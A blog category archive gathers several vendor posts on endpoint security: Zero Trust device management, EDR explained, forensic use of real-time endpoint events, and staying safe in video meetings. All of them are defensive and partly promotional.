Category Archives: Endpoint security

Zero Trust Deployment Guide for devices

The modern enterprise has an incredible diversity of endpoints accessing their data. This creates a massive attack surface, and as a result, endpoints can easily become the weakest link in your Zero Trust security strategy.

Whether a device is a personally owned BYOD device or a corporate-owned and fully managed device, we want to have visibility into the endpoints accessing our network, and ensure we’re only allowing healthy and compliant devices to access corporate resources. Likewise, we are concerned about the health and trustworthiness of mobile and desktop apps that run on those endpoints. We want to ensure those apps are also healthy and compliant and that they prevent corporate data from leaking to consumer apps or services through malicious intent or accidental means.

Get visibility into device health and compliance

Gaining visibility into the endpoints accessing your corporate resources is the first step in your Zero Trust device strategy. Typically, companies are proactive in protecting PCs from vulnerabilities and attacks, while mobile devices often go unmonitored and without protections. To help limit risk exposure, we need to monitor every endpoint to ensure it has a trusted identity, has security policies applied, and the risk level for things like malware or data exfiltration has been measured, remediated, or deemed acceptable. For example, if a personal device is jailbroken, we can block access to ensure that enterprise applications are not exposed to known vulnerabilities.

  1. To ensure you have a trusted identity for an endpoint, register your devices with Azure Active Directory (Azure AD). Devices registered in Azure AD can be managed using tools like Microsoft Endpoint Manager, Microsoft Intune, System Center Configuration Manager, Group Policy (hybrid Azure AD join), or other supported third-party tools (using the Intune Compliance API + Intune license). Once you’ve configured your policy, share the following guidance to help users get their devices registered—new Windows 10 devices, existing Windows 10 devices, and personal devices.
  2. Once we have identities for all the devices accessing corporate resources, we want to ensure that they meet the minimum security requirements set by your organization before access is granted. With Microsoft Intune, we can set compliance rules for devices before granting access to corporate resources. We also recommend setting remediation actions for noncompliant devices, such as blocking a noncompliant device or offering the user a grace period to get compliant.

Restricting access from vulnerable and compromised devices

Once we know the health and compliance status of an endpoint through Intune enrollment, we can use Azure AD Conditional Access to enforce more granular, risk-based access policies. For example, we can ensure that no vulnerable devices (like devices with malware) are allowed access until remediated, or ensure logins from unmanaged devices only receive limited access to corporate resources, and so on.

  1. To get started, we recommend only allowing access to your cloud apps from Intune-managed, domain-joined, and/or compliant devices. These are baseline security requirements that every device will have to meet before access is granted.
  2. Next, we can configure device-based Conditional Access policies in Intune to enforce restrictions based on device health and compliance. This will allow us to enforce more granular access decisions and fine-tune the Conditional Access policies based on your organization’s risk appetite. For example, we might want to exclude certain device platforms from accessing specific apps.
  3. Finally, we want to ensure that your endpoints and apps are protected from malicious threats. This will help ensure your data is better-protected and users are at less risk of getting denied access due to device health and/or compliance issues. We can integrate data from Microsoft Defender Advanced Threat Protection (ATP), or other Mobile Threat Defense (MTD) vendors, as an information source for device compliance policies and device Conditional Access rules. Options below:

Enforcing security policies on mobile devices and apps

We have two options for enforcing security policies on mobile devices: Intune Mobile Device Management (MDM) and Intune Mobile Application Management (MAM). In both cases, once data access is granted, we want to control what the user does with the data. For example, if a user accesses a document with a corporate identity, we want to prevent that document from being saved in an unprotected consumer storage location or from being shared with a consumer communication or chat app. With Intune MAM policies in place, they can only transfer or copy data within trusted apps such as Office 365 or Adobe Acrobat Reader, and only save it to trusted locations such as OneDrive or SharePoint.

Intune ensures that the device configuration aspects of the endpoint are centrally managed and controlled. Device management through Intune enables endpoint provisioning, configuration, automatic updates, device wipe, or other remote actions. Device management requires the endpoint to be enrolled with an organizational account and allows for greater control over things like disk encryption, camera usage, network connectivity, certificate deployment, and so on.

Mobile Device Management (MDM)

  1. First, using Intune, let’s apply Microsoft’s recommended security settings to Windows 10 devices to protect corporate data (Windows 10 1809 or later required).
  2. Ensure your devices are patched and up to date using Intune—check out our guidance for Windows 10 and iOS.
  3. Finally, we recommend ensuring your devices are encrypted to protect data at rest. Intune can manage a device’s built-in disk encryption across both macOS and Windows 10.

Meanwhile, Intune MAM is concerned with management of the mobile and desktop apps that run on endpoints. Where user privacy is a higher priority, or the device is not owned by the company, app management makes it possible to apply security controls (such as Intune app protection policies) at the app level on non-enrolled devices. The organization can ensure that only apps that comply with their security controls, and running on approved devices, can be used to access emails or files or browse the web.

With Intune, MAM is possible for both managed and unmanaged devices. For example, a user’s personal phone (which is not MDM-enrolled) may have apps that receive Intune app protection policies to contain and protect corporate data after it has been accessed. Those same app protection policies can be applied to apps on a corporate-owned and enrolled tablet. In that case, the app-level protections complement the device-level protections. If the device is also managed and enrolled with Intune MDM, you can choose not to require a separate app-level PIN if a device-level PIN is set, as part of the Intune MAM policy configuration.

Mobile Application Management (MAM)

  1. To protect your corporate data at the application level, configure Intune MAM policies for corporate apps. MAM policies offer several ways to control access to your organizational data from within apps:
    • Configure data relocation policies like save-as restrictions for saving organization data or restrict actions like cut, copy, and paste outside of organizational apps.
    • Configure access policy settings like requiring simple PIN for access or blocking managed apps from running on jailbroken or rooted devices.
    • Configure automatic selective wipe of corporate data for noncompliant devices using MAM conditional launch actions.
    • If needed, create exceptions to the MAM data transfer policy to and from approved third-party apps.
  2. Next, we want to set up app-based Conditional Access policies to ensure only approved corporate apps access corporate data.
  3. Finally, using app configuration (appconfig) policies, Intune can help eliminate app setup complexity or issues, make it easier for end users to get going, and ensure better consistency in your security policies. Check out our guidance on assigning configuration settings.


We hope the above helps you deploy and successfully incorporate devices into your Zero Trust strategy. Make sure to check out the other deployment guides in the series by following the Microsoft Security blog. For more information on Microsoft Security Solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Zero Trust Deployment Guide for devices appeared first on Microsoft Security.

Your Network Has Left the Building – How do you secure it?

Your network has left the building. It’s no longer sitting in the server room down the hall where you can keep an eye on it. And it’s no longer safely tucked behind your corporate firewall. Instead, it’s in the cloud. It’s inside your users’ smartphones. And especially now, your corporate network is in people’s homes.

Today’s security teams have to mind various areas of their network and cloud infrastructure, remote users and endpoints, and applications running everywhere in order to remain secure. And as soon as new technology is developed or widely used, attackers find ways to take advantage of it – making security vigilance even more critical.

In our recent 2020 CISO Benchmark Study, we asked security professionals which areas of their environment they find most challenging to defend. According to the study:

  • 52% find mobile devices and data stored in the public cloud very or extremely challenging to defend
  • 50% find private cloud infrastructure very or extremely difficult to defend
  • 41% find data centers and network infrastructure very or extremely difficult to defend
  • 39% say they are really struggling to secure applications

While the moves to mobile and cloud seem to pose the biggest challenges, the data shows that the rest of your security concerns haven’t gone away either.

So how do you do it all?

How do you protect some of the newer technologies that have become part of your environment while still paying attention to things like your traditional data center and network infrastructure to make sure they are not breached? And how do you do this amidst unprecedented remote worker hurdles and a dramatic shortage of skilled cybersecurity professionals? Here are some examples of how Cisco can help you protect the challenge areas outlined above.


In order for security to work, it has to work across all the devices your employees are using. Cisco’s endpoint security combines a variety of security technologies to make sure your users’ mobile devices are protected, and in turn, do not compromise the corporate network. For example, Cisco AnyConnect and Cisco Duo enable users to securely access your network or applications using managed or unmanaged, mobile or traditional devices. And Cisco Umbrella and Cisco AMP for Endpoints defend these devices against threats from the first line to the last line of defense.

In response to current challenges, we have also launched the Cisco Secure Remote Worker solution to help organizations address the recent rise in remote and mobile workers. The intent is to better enable IT and security teams to quickly provision remote workers without sacrificing cybersecurity. The offering includes extended free trials and expanded usage counts to help alleviate today’s tremendous IT and security demands. Learn more about how this offering can enable secure access for a distributed workforce and help you defend against malware across the network, endpoints, cloud, and applications.


Cisco’s cloud security protects your assets and data in the cloud from multiple angles. It helps secure private, public, and hybrid clouds to facilitate your transition to a multicloud environment. With Cisco’s cloud edge security, you can: 1) secure cloud access, 2) protect cloud users, data, and applications, and 3) extend in-depth visibility and threat detection into the cloud.

Data Center

Today’s application workloads are more dynamic, moving across on-prem and multicloud environments. This requires a new strategy for data center security that can protect workloads wherever they go. The Cisco Secure Data Center solution provides several layers of security through in-depth visibility, segmentation, and threat protection. The solution brings together key technologies that let you see, segment, and secure your data as it travels across your environment and into the cloud.


Related to data center security is application security. Cisco’s application security brings continuous, adaptive protection closer to your applications to give you greater insight and control over what is running in your environment. The security follows your applications to ensure protection without hindering productivity and innovation. This allows you to understand application behaviors, automate micro-segmentation, and use security analytics to speed detection.


Perhaps the trickiest area to summarize is network security due to the ever-expanding components that make up today’s “network.” You need a next-generation firewall that can keep up with your expanding infrastructure and sophisticated attackers. You need a way for authorized users to securely connect to the network. And once they’re logged in, you need multiple layers of protection to prevent them from abusing their privileges or being compromised by malware.

Bringing it all together

While we secure many areas of the corporate environment, we don’t do so in silos. Our security products all work together – and with the customer’s infrastructure, including third-party technologies – to provide more cohesive, automated defenses. By taking a platform approach to security, Cisco SecureX results in greater visibility, collaboration, and protection across all threat vectors, access points, and areas of your infrastructure. This reduces complexity while enabling a zero-trust security strategy.

For more information

Explore our entire security portfolio and review the 2020 CISO Benchmark Report for more information on how to protect various areas of your environment.

This post is part of a series covering topics and data from our 2020 CISO Benchmark Report. Read previous posts here, and be sure to check back soon for more!

The post Your Network Has Left the Building – How do you secure it? appeared first on Cisco Blogs.

What Is EDR and Why Is It Important?

Oftentimes, your organization’s endpoints can become key entry points for cyber attackers. With the evolution of workplace mobility and employees connecting to the Internet from their off-site endpoints across the globe, it should come as no surprise that devices are becoming increasingly vulnerable. And without the proper cybersecurity protection measures in place, malicious hackers can easily take advantage of any existing vulnerabilities. This is why the need for enhanced security tools that surpass traditional Firewalls and Antivirus solutions has emerged as an undeniably top priority for organizations large and small. EDR (short for Endpoint Detection and Response) is the term that encompasses threat hunting, prevention, and detection tools and has become the golden standard in cybersecurity.

In this article, I will try to elude what Endpoint Detection and Response (EDR) is and why it has become a vital part of your business.

Cybercriminals do their utmost to successfully target and attack your company’s endpoints for various reasons. They might want to exfiltrate your data or hold it for ransom, override your machines, exploit them in a botnet and conduct DDoS attacks, and much more.

What does EDR mean?

The term EDR stands for Endpoint Detection and Response (or Endpoint Threat Detection & Response). It was coined in 2013 by Anton Chuvakin, former VP and security analyst at Gartner, now security product strategist at Google:

“After a long agonizing process that involved plenty of conversations with vendors, enterprises and other analysts, I have settled on this generic name for the tools primarily focused on detecting and investigating suspicious activities (and traces of such) other problems on hosts/endpoints: Endpoint Threat Detection & Response.” Anton Chuvakin, Gartner’s blog

Essentially, Endpoint Detection Response (EDR) systems have been created to detect and actively respond to sophisticated malware and cyber-attacks. EDR solutions can recognize suspicious patterns that can be further investigated later on. As implied by their name, these tools have been designed specifically for endpoints (and not networks).

Why is EDR important?

Compared to traditional security solutions, EDR provides enhanced visibility into your endpoints and allows for faster response time.

Furthermore, EDR tools detect and protect your organization from advanced forms of malware (such as polymorphic malware), APTs, phishing, etc. It’s also worth mentioning that EDR solutions are based upon machine learning algorithms designed to spot yet unknown types of malware, which will subsequently make behavior-based categorization decisions.

In essence, if certain files seem to behave maliciously (and similar to already known kinds of malware), they will not manage to bypass EDR solutions.

EDR vs. Antivirus – What’s the difference?

In the past, a traditional Antivirus solution may have sufficed to cover the protection of your endpoints. But as malware evolved into more advanced and pervasive forms, it became clear that Antivirus was no longer enough and that prevention and detection mechanisms needed to keep up with the ever-evolving threatscape.

EDR solutions have several unique features and benefits which conventional Antivirus programs do not deliver.

Compared to the novel EDR systems, traditional Antivirus solutions are simpler in nature and should be seen as an important component of EDR.

Normally, Antivirus tools accomplish basic tasks such as scanning, detection, malware remover.

On the other hand, EDR is superior to the traditional Antivirus (which uses signature-based threat detection methods). EDR tools are much broader in scope and should include multiple security layers such as attack blocking, patching, exploit blocking, firewall, whitelisting/blacklisting, full category-based blocking, admin rights management, and a next-gen Antivirus.

EDR security solutions are therefore more suitable for today’s businesses as the traditional Antivirus has become an archaic security tool in terms of guaranteeing complete security.

Heimdal Official Logo

Simple Antivirus protection is no longer enough.

Thor Premium Enterprise

is the multi-layered Endpoint Detection and Response (EDR) approach
to organizational defense.
  • Next-gen Antivirus which stops known threats;
  • DNS traffic filter which stops unknown threats;
  • Automatic patches for your software and apps with no interruptions;
  • Protection against data leakage, APTs, ransomware and exploits;
Try it for FREE today Offer valid only for companies.

The main characteristics and benefits of EDR

The features of Endpoint Detection and Response tools can vary from vendor to vendor, yet we can notice a few main characteristics that define EDR and that are considered essential. Each tool can have a certain degree of sophistication, but below I would like to point out the five major characteristics of EDR:

#1. Integration with multiple tools

EDR solutions always come in multiple tools/layers. They feed intelligence into each other to successfully protect your organization from multiple angles.

#2. Alerts, reporting, and a unified overview of your environment

A dashboard that provides access to your endpoints’ protection status should be a mandatory feature of any EDR solution. At the same time, you should be able to receive timely alerts and have the capability to identify and monitor endpoint security threats and vulnerabilities.

Also, running reports for compliance purposes is a crucial aspect of all EDR tools.

#3.  Advanced response capabilities and automation

An EDR technology should provide you with specialized tools for assessing and reacting to security incidents, including prevention, detection, threat intelligence, and forensics. At the same time, automation capabilities are essential.

#4. Global availability

EDR should allow you not to be dependent on platform constraints and be able to manage your environment wherever you or your teams are, at the time of your choosing.

#5. Prevention

Last in order but not of importance, an effective EDR technology must offer prevention methods and adaptive protection against next-generation malware, based on behavioral analysis of incoming and outgoing traffic in your organization, in order to prevent and mitigate attacks that cannot be detected by reactive solutions like an Antivirus.

Why Is HeimdalTM’s EDR technology the best on the market? Introducing E-PDR, the next-gen approach to EDR.

We’ve combined an Endpoint Protection Platform (EPP) with Endpoint Detection and Response (EDR) and achieved what we consider to be the golden standard in cybersecurity: E-PDR (Endpoint Prevention, Detection, and Response).

Below I will discuss the numerous ways in which you can benefit from our E-PDR technology, superior to other existing EDR tools.

First of all, HeindalTM’s EDR brings you real-time proactive security via DNS filtering, smart threat hunting, proactive behavioral detection, automated patch management, a next-gen Antivirus, and a module for automated admin rights escalation/de-escalation procedures. Thus, we deliver a layered security approach within a single and lightweight agent. Our customers get access to next-gen endpoint threat prevention and protection from existing and undiscovered threats, plus a market-leading detection rate and compliance, all in one package.

Heimdal Official Logo

System admins waste 30% of their time manually managing user rights or installations.

Thor AdminPrivilege™

is the automatic Privileged Access Management (PAM) solution
which frees up huge chunks of sys-admin time.
  • Automate the elevation of admin rights on request;
  • Approve or reject escalations with one click;
  • Provide a full audit trail into user behavior;
  • Automatically de-escalate on infection;
Try it for FREE today Offer valid only for companies.

By combining Thor Foresight Enterprise and Thor Vigilance Enterprise you will obtain proactive IOCs and enhanced IOAs and gain a unique EDR ability to mitigate even concealed or unknown malware.

Secondly, our dashboard always provides you with notifications and warnings for all active clients. It offers real-time threat and status reporting, delivered in the interval of your choosing. Your data will be graphed and scaled daily, weekly, or monthly and it can also be integrated into SIEM via API. The HeimdalTM Security Unified Threat Dashboard (UTD) stores the entire history throughout your customer lifecycle and helps you perform compliance audits and risk assessments. Alongside weekly reports, data exports, e-mail alerts, and built-in data drill down, the HeimdalTM UTD offers a powerful yet simple way to manage your environment.

Our platform also enables you to define policies for each of your components in great detail. For example, you can refine the blacklisting of websites, files, processes, or patches per active directory group of your HeimdalTM environment. This will give you the powerful option to individually tailor your IT environment and create policies to fit your exact needs across the Active Directory groups in your organization. Once configured, the HeimdalTM deployment is simple and easy and can happen through any MSI deployment tool.

Thirdly, because we’ve taken into consideration the evolving needs of the global enterprise, our E-PDR technology works anytime and anywhere in the world, for both on-site and remote work set-ups.

Last but not least, our multi-layered security suite combined into our E-PDR system comes in a user friendly and easy to deploy agent, that will be extremely lightweight on your systems and will certainly become the greatest time-saver for your sysadmins.


No matter which EDR solution you end up choosing, make sure it can be scaled up and down and that it fits your organization’s needs.

Should you want to try out our EDR technology, please register on the website or contact us as


The post What Is EDR and Why Is It Important? appeared first on Heimdal Security Blog.

Using Real-Time Events in Investigations

To understand what a threat actor did on a Windows system, analysts often turn to the tried and true sources of historical endpoint artifacts such as the Master File Table (MFT), registry hives, and Application Compatibility Cache (AppCompat). However, these evidence sources were not designed with detection or incident response in mind; crucial details may be omitted or cleared through anti-forensic methods. By looking at historical evidence alone, an analyst may not see the full story.

Real-time events can be thought of as forensic artifacts specifically designed for detection and incident response, implemented through Enterprise Detection and Response (EDR) solutions or enhanced logging implementations like Sysmon. During active-attacker endpoint investigations, FireEye Mandiant has found real-time events to be useful in filling in the gaps of what an attacker did. These events record different types of system activities such as process execution, file write activity, network connections, and more.

During incident response engagements, Mandiant uses FireEye Endpoint Security to track endpoint system events in real-time. This feature allows investigators to track an attacker on any system by alerting on and reviewing these real-time events. An analyst can use our solution’s built-in Audit Viewer or Redline to review real-time events.

Let’s look at some examples of Windows real-time events available on our solution and how they can be leveraged during an investigation. Let’s assume the account TEST-DOMAIN\BackupAdmin was an inactive Administrator account compromised by an attacker. Please note the examples provided in this post are based on real-time events observed during engagements but have been recreated or altered to preserve client confidentiality.

Process Execution Events

There are many historical process execution artifacts including AppCompat, AmCache, WMI CCM_RecentlyUsedApps, and more. A single artifact rarely covers all the useful details relating to a process's execution, but real-time process execution events change that. Our solution’s real-time process execution events record execution time, full process path, process identification number (PID), parent process path, parent PID, user, command line arguments, and even the process MD5 hash.

Table 1 provides an example of a real-time process execution event recorded by our solution.



Timestamp (UTC)

2020-03-10 16:40:58.235

Sequence Number




Process Path




Parent PID


Parent Process Path





"C:\Windows\Temp\legitservice.exe"  -b -m

Process MD5 Hash


Table 1: Example real-time process execution event

Based on this real-time process execution event, the process C:\Windows\System32\cmd.exe with PID 9103 executed the file C:\Windows\Temp\legitservice.exe with PID 9392 and the MD5 hash a823bc31395539816e8e4664e884550f. This new process used the command line arguments -b -m under the user context of TEST-DOMAIN\BackupAdmin.

We can compare this real-time event with what an analyst might see in other process execution artifacts. Table 2 provides an example AppCompat entry for the same executed process. Note the recorded timestamp is for the last modified time of the file, not the process start time.



File Last
Modified (UTC)

2020-03-07 23:48:09

File Path


Executed Flag


Table 2: Example AppCompat entry

Table 3 provides an example AmCache entry. Note the last modified time of the registry key can usually be used to determine the process start time and this artifact includes the SHA1 hash of the file.



Registry Key
Last Modified (UTC)

2020-03-10 16:40:58

File Path


File Sha1 Hash


Table 3: Example AmCache entry

Table 4 provides an example Windows Event Log process creation event. Note this artifact includes the PID in hexadecimal notation, details about the parent process, and even a field for where the process command line arguments should be. In this example the command line arguments are not present because they are disabled by default and Mandiant rarely sees this policy enabled by clients on investigations.



Write Time (UTC)

2020-03-10 16:40:58




Microsoft Windows security




A new process has been created.

Creator Subject:
      Security ID:             TEST-DOMAIN\BackupAdmin
      Account Name:            BackupAdmin
      Account Domain:          TEST-DOMAIN
      Logon ID:                0x6D6AD

Target Subject:
      Security ID:             NULL SID
      Account Name:            -
      Account Domain:          -
      Logon ID:                0x0

Process Information:
      New Process ID:          0x24b0
      New Process Name:        C:\Windows\Temp\legitservice.exe
      Token Elevation Type:    %%1938
      Mandatory Label:         Mandatory Label\Medium Mandatory Level
      Creator Process ID:      0x238f
      Creator Process Name:    C:\Windows\System32\cmd.exe
      Process Command Line:    

Table 4: Example Windows event log process creation event

If we combine the evidence available in AmCache with a fully detailed Windows Event Log process creation event, we could match the evidence available in the real-time event except for a small difference in file hash types.

File Write Events

An attacker may choose to modify or delete important evidence. If an attacker uses a file shredding tool like Sysinternal’s SDelete, it is unlikely the analyst will recover the original contents of the file. Our solution’s real-time file write events are incredibly useful in situations like this because they record the MD5 hash of the files written and partial contents of the file. File write events also record which process created or modified the file in question.

Table 5 provides an example of a real-time file write event recorded by our solution.



Timestamp (UTC)

2020-03-10 16:42:59.956

Sequence Number




Process Path




Device Path


File Path


File MD5 Hash


Num Bytes Seen Written






Event reason

File closed



Base64 Encoded
Data At Lowest Offset


Text At Lowest Offset

Creating 'WindowsServiceNT.log' logfile : OK....mimikatz(command

Table 5: Example real-time file write event

Based on this real-time file write event, the malicious executable C:\Windows\Temp\legitservice.exe wrote the file C:\Windows\Temp\WindowsServiceNT.log to disk with the MD5 hash 30a82a8a864b6407baf9955822ded8f9. Since the real-time event recorded the beginning of the written file, we can determine the file likely contained Mimikatz credential harvester output which Mandiant has observed commonly starts with OK....mimikatz.

If we investigate a little later, we’ll see a process creation event for C:\Windows\Temp\taskassist.exe with the MD5 file hash 2b5cb081721b8ba454713119be062491 followed by several file write events for this process summarized in Table 6.


File Path

File Size

2020-03-10 16:53:42.351



2020-03-10 16:53:42.351



2020-03-10 16:53:42.351



2020-03-10 16:53:42.351





2020-03-10 16:53:42.382



2020-03-10 16:53:42.382



2020-03-10 16:53:42.382



Table 6: Example timeline of SDelete File write events

Admittedly, this activity may seem strange at a first glance. If we do some research on the its file hash, we’ll see the process is actually SDelete masquerading as C:\Windows\Temp\taskassist.exe. As part of its secure deletion process, SDelete renames the file 26 times in a successive alphabetic manner.

Network Events

Incident responders rarely see evidence of network communication from historical evidence on an endpoint without enhanced logging. Usually, Mandiant relies on NetFlow data, network sensors with full or partial packet capture, or malware analysis to determine the command and control (C2) servers with which a malware sample can communicate. Our solution’s real-time network events record both local and remote network ports, the leveraged protocol, and the relevant process.

Table 7 provides an example of a real-time IPv4 network event recorded by our solution.



Timestamp (UTC)

2020-03-10 16:46:51.690

Sequence Number




Process + Path




Local IP Address

Local Port


Remote IP Address

Remote Port




Table 7: Example real-time network connection event

Based on this real-time IPv4 network event, the malicious executable C:\Windows\Temp\legitservice.exe made an outbound TCP connection to

Registry Key Events

By using historical evidence to investigate relevant timeframes and commonly abused registry keys, we can identify malicious or leveraged keys. Real-time registry key events are useful for linking processes to the modified registry keys. They can also show when an attacker deletes or renames a registry key. This is useful to an analyst because the only available timestamp recorded in the registry is the last modified time of a registry key, and this timestamp is updated if a parent key is updated.

Table 8 provides an example of a real-time registry key event recorded by our solution.



Timestamp (UTC)

2020-03-10 16:46:56.409

Sequence Number




Process + Path




Event Type




Key Path


Original Path


Value Name


Value Type


Base64 Encoded




Table 8: Example real-time registry key event

For our solution's real-time registry events, we can map the event type to the operation performed using Table 9.

Event Type Value







PostCreateKey, PostCreateKeyEx, PreCreateKeyEx





Table 9: FireEye Endpoint Security real-time registry key event types

Based on this real-time registry key event, the malicious executable C:\Windows\Temp\legitservice.exe created the Windows service LegitWindowsService. If we investigated the surrounding registry keys, we might identify even more information about this malicious service.


The availability of real-time events designed for forensic analysis can fill in gaps that traditional forensic artifacts cannot on their own. Mandiant has seen great value in using real-time events during active-attacker investigations. We have used real-time events to determine the functionality of attacker utilities that were no longer present on disk, to determine users and source network addresses used during malicious remote desktop activity when expected corresponding event logs were missing, and more.

Check out our FireEye Endpoint Security page and Redline page for more information (as well as Redline on the FireEye Market), and take a FireEye Endpoint Security tour today.

From Bugs to Zoombombing: How to Stay Safe in Online Meetings

The COVID-19 pandemic, along with social distancing, has done many things to alter our lives. But in one respect it has merely accelerated a process begun many years ago. We were all spending more and more time online before the virus struck. But now, forced to work, study and socialize at home, the online digital world has become absolutely essential to our communications — and video conferencing apps have become our “face-to-face” window on the world.

The problem is that as users flock to these services, the bad guys are also lying in wait — to disrupt or eavesdrop on our chats, spread malware, and steal our data. Zoom’s problems have perhaps been the most widely publicized, because of its quickly rising popularity, but it’s not the only platform whose users have been potentially at risk. Cisco’s WebEx and Microsoft Teams have also had issues; while other platforms, such as Houseparty, are intrinsically less secure (almost by design for their target audience, as the name suggests).

Let’s take a look at some of the key threats out there and how you can stay safe while video conferencing.

What are the risks?

Depending on the platform (designed for work or play) and the use case (business or personal), there are various opportunities for the online attacker to join and disrupt or eavesdrop on video conferencing calls. The latter is especially dangerous if you’re discussing sensitive business information.

Malicious hackers may also look to deliver malware via chats or shared files to take control of your computer, or to steal your passwords and sensitive personal and financial information. In a business context, they could even try to hijack your video conferencing account to impersonate you, in a bid to steal info from or defraud your colleagues or company.

The bad guys may also be able to take advantage of the fact that your home PCs and devices are less well-secured than those at work or school—and that you may be more distracted at home and less alert to potential threats.

To accomplish their goals, malicious hackers can leverage various techniques at their disposal. These can include:

  • Exploiting vulnerabilities in the video conferencing software, particularly when it hasn’t been updated to fend off the latest threats
  • Stealing your log-ins/meeting ID via malware or phishing attacks; or by obtaining a meeting ID or password shared on social media
  • Hiding malware in legitimate-looking video apps, links and files
  • Theft of sensitive data from meeting recordings stored locally or in the cloud.

Zooming in on trouble

Zoom has in many ways become the victim of its own success. With daily meeting participants soaring from 10 million in December last year to 200 million by March 2020, all eyes have been focused on the platform. Unfortunately, that also includes hackers. Zoom has been hit by a number of security and privacy issues over the past several months, which include “Zoombombing” (meetings disrupted by uninvited guests), misleading encryption claims, a waiting room vulnerability, credential theft and data collection leaks, and fake Zoom installers. To be fair to Zoom, it has responded quickly to these issues, realigning its development priorities to fix the security and privacy issues discovered by its intensive use.

And Zoom isn’t alone. Earlier in the year, Cisco Systems had its own problem with WebEx, its widely-used enterprise video conferencing system, when it discovered a flaw in the platform that could allow a remote, unauthenticated attacker to enter a password-protected video conferencing meeting. All an attacker needed was the meeting ID and a WebEx mobile app for iOS or Android, and they could have barged in on a meeting, no authentication necessary. Cisco quickly moved to fix the high-severity vulnerability, but other flaws (also now fixed) have cropped up in WebEx’s history, including one that could enable a remote attacker to send a forged request to the system’s server.

More recently, Microsoft Teams joined the ranks of leading business videoconferencing platforms with potentially deadly vulnerabilities. On April 27 it surfaced that for at least three weeks (from the end of February till the middle of March), a malicious GIF could have stolen user data from Teams accounts, possibly across an entire company. The vulnerability was patched on April 20—but it’s a reminder to potential video conferencing users that even leading systems such as Zoom, WebEx, and Teams aren’t fool-proof and require periodic vulnerability and security fixes to keep them safe and secure. This is compounded during the COVID-19 pandemic when workers are working from home and connecting to their company’s network and systems via possibly unsecure home networks and devices.

Video conferencing alternatives

So how do you choose the best, most secure, video conferencing software for your work-at-home needs? There are many solutions on the market today. In fact, the choice can be dizzying. Some simply enable video or audio meetings/calls, while others also allow for sharing and saving of documents and notes. Some are only appropriate for one-on-one connections or small groups, while others can scale to thousands.

In short, you’ll need to choose the video conferencing solution most appropriate to your needs, while checking if it meets a minimum set of security standards for working at home. This set of criteria should include end-to-end encryption, automatic and frequent security updates, the use of auto-generated meeting IDs and strong access controls, a program for managing vulnerabilities, and last but not least, good privacy practices by the company.

Some video conferencing options alongside Zoom, WebEx, and Teams include:

  • Signal which is end-to-end encrypted and highly secure, but only supports one-to-one calls.
  • FaceTime, Apple’s video chat tool, is easy-to-use and end-to-end encrypted, but is only available to Mac and iOS users.
  • Jitsi Meet is a free, open-source video conferencing app that works on Android, iOS, and desktop devices, with no limit on participants beyond your bandwidth.
  • Skype Meet Now is Microsoft’s free, popular conferencing tool for up to 50 users that can be used without an account, (in contrast to Teams, which is a paid, more business-focused platform for Office 365 users).
  • Google Duo is a free option for video calls only, while the firm’s Hangouts platform can also be used for messaging. Hangouts Meet is a more business-focused paid version.
  • is a well-known telemedicine platform used by doctors and therapists that works through your browser—so it’s up to you to keep your browser updated and to ensure the appropriate security and privacy settings are in place. Secure medical consultation with your healthcare provider is of particular concern during the shelter- and work-from-home quarantine.

How do I stay safe?

Whatever video conferencing platform you use, it’s important to bear in mind that cyber-criminals will always be looking to take advantage of any security gaps they can find — in the tool itself or your use of it. So how do you secure your video conferencing apps? Some tips listed here are Zoom-specific, but consider their equivalents in other platforms as general best-practice tips. Depending on the use case, you might choose to not enable some of the options here.

  • Check for end-to-end encryption before getting onboard with the app. This includes encryption for data at rest.
  • Ensure that you generate one-off meeting IDs and passwords automatically for recurring meetings (Zoom).
  • Don’t share any meeting IDs online.
  • Use the “waiting room” feature in Zoom (now fixed), so the host can only allow attendees from a pre-assigned list.
  • Lock the meeting once it’s started to stop anyone new from joining.
  • Allow the host to put attendees on hold, temporarily removing them from a meeting if necessary.
  • Play a sound when someone enters or leaves the room.
  • Set screen-sharing to “host only” to stop uninvited guests from sharing disruptive content.
  • Disable “file transfers” to block possible malware.
  • Keep your systems patched and up-to-date so there are no bugs that hackers can target.
  • Only download conferencing apps from official iOS/Android stores and manufacturer websites.
  • Never click on links or open attachments in unsolicited mail.
  • Check the settings in your video conferencing account. Switch off camera access if you don’t want to appear on-screen.
  • Use a password manager for video conferencing app log-ins.
  • Enhance passwords with two-factor authentication (2FA) or Single-Sign-On (SSO) to protect access, if available.
  • Install anti-malware software from a reputable vendor on all devices and PCs. And implement a network security solution if you can.

How Trend Micro can help

Fortunately, Trend Micro has a range of capabilities that can support your efforts to stay safe while using video conferencing services.

Trend Micro Home Network Security (HNS) protects every device in your home connected to the internet. That means it will protect you from malicious links and attachments in phishing emails spoofed to appear as if sent from video conferencing firms, as well as from those sent by hackers that may have covertly entered a meeting. Its Vulnerability Check can identify any vulnerabilities in your home devices and PCs, including work laptops, and its Remote Access Protection can reduce the risk of tech support scams and unwanted remote connections to your device. Finally, it allows parents to control their kids’ usage of video conferencing applications, to limit their exposure.

Trend Micro Security also offers protection against email, file, and web threats on your devices. Note too, that Password Manager is automatically installed with Maximum Security to help users create unique, strong passwords for each application/website they use, including video conferencing sites.

Finally, Trend Micro WiFi Protection (multi-platform) / VPN Proxy One (Mac and iOS) offer VPN connections from your home to the internet, creating secure encrypted tunnels for traffic to flow down. The VPN apps work on both Wi-Fi and Ethernet connections. This could be useful for users concerned their video conferencing app isn’t end-to-end encrypted, or for those wishing to protect their identity and personal information when interacting on these apps.

The post From Bugs to Zoombombing: How to Stay Safe in Online Meetings appeared first on .

What the hell does “zero day” even mean anymore?

I seem to have spent a fair amount of my time recently talking to a variety of people about “zero days” and the one thing that has really struck me is that almost everyone has a different view on what a “zero day” actually is….so I figured the time had come to try and add a little clarity to the situation.

For those of you really short on time, let’s be clear – zero days do exist, and they can be highly damaging, but there are many other things both easier to fix and with a greater Return on Investment for most organizations. So, step 1 should be to fix things like patching and user education before devoting limited resources to the actually tiny minority of truly zero day attacks.

And for those of you with a little more time on your hands, let’s examine why that last paragraph recommends what it does. First things first, we should talk about vulnerabilities and exploits because whilst the 2 are clearly linked they are, of course, very different. In simple terms a vulnerability is a weakness or error in a piece of code. An exploit is a separate piece of code that takes advantage of that vulnerability to enable the bad guys to achieve their goals.

